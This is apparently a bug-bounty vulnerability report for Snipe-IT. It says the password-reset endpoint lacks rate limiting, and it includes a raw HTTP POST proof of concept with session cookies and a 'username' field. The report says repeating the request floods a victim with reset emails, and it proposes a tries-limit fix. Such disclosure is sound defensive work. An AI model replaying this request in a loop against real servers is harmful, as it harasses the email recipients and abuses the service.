Insufficient Granularity of Access Control in snipe/snipe-it

Description

There is no rate limit sent unlimited email victim or any email address

Proof of Concept

There is no rate limit return-password , attacker to send unlimited email to victim or any email address.

POST /password/email HTTP/1.1

Host: demo.snipeitapp.com

Connection: close

Content-Length: 62

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: https://demo.snipeitapp.com

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed- exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: https://demo.snipeitapp.com/password/reset

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: snipeitv48_session=h0w6J6utAn2wIe4EMMkWHJVI2PTaOzBPLLuOH4JG; XSRF- TOKEN=eyJpdiI6IkttM01uZ1lpMHZFY3I5a0wxVlVnUXc9PSIsInZhbHVlIjoiVVlvemxGd3JXQjkxNTh2OTJHNGpDZ3VzTGY4NFc1K1N4dld4ekFiN2h0Y1RscFZJa2pUcFVZVkpzamxKeGZhWG9IdlZxdlhaRkdtQk1iMkZ2dmJpVDc0Zmx2VDJqMkpNY0p6RWpDWW5ZWDV4MHN3OEZIYk1TYTk2aWlOUm9qNU4iLCJtYWMiOiI3ZWY0ZTYyNTNlNDEzZGQzOTI2OTVhYWQ2OWY4M2I3MmZjOWM1MTc4ODYzNGYzYTQ5MGYwY2NlMGE4ODVjNjMxIn0%3D

_token=qNXYj866UOlCog9UfSQl3U8NidUTWwBqKkzG8VoG&username=admin

Post data username= parameter value to victim username. this request unlimited time and victim email address will received unlimited verification email .

Impact

Attacker can sent unlimited email to any mail address .

Solution:

'reset_password_tries_limit'=>5, 'reset_password_tries'=>"int(10) unsigned DEFAULT '0'",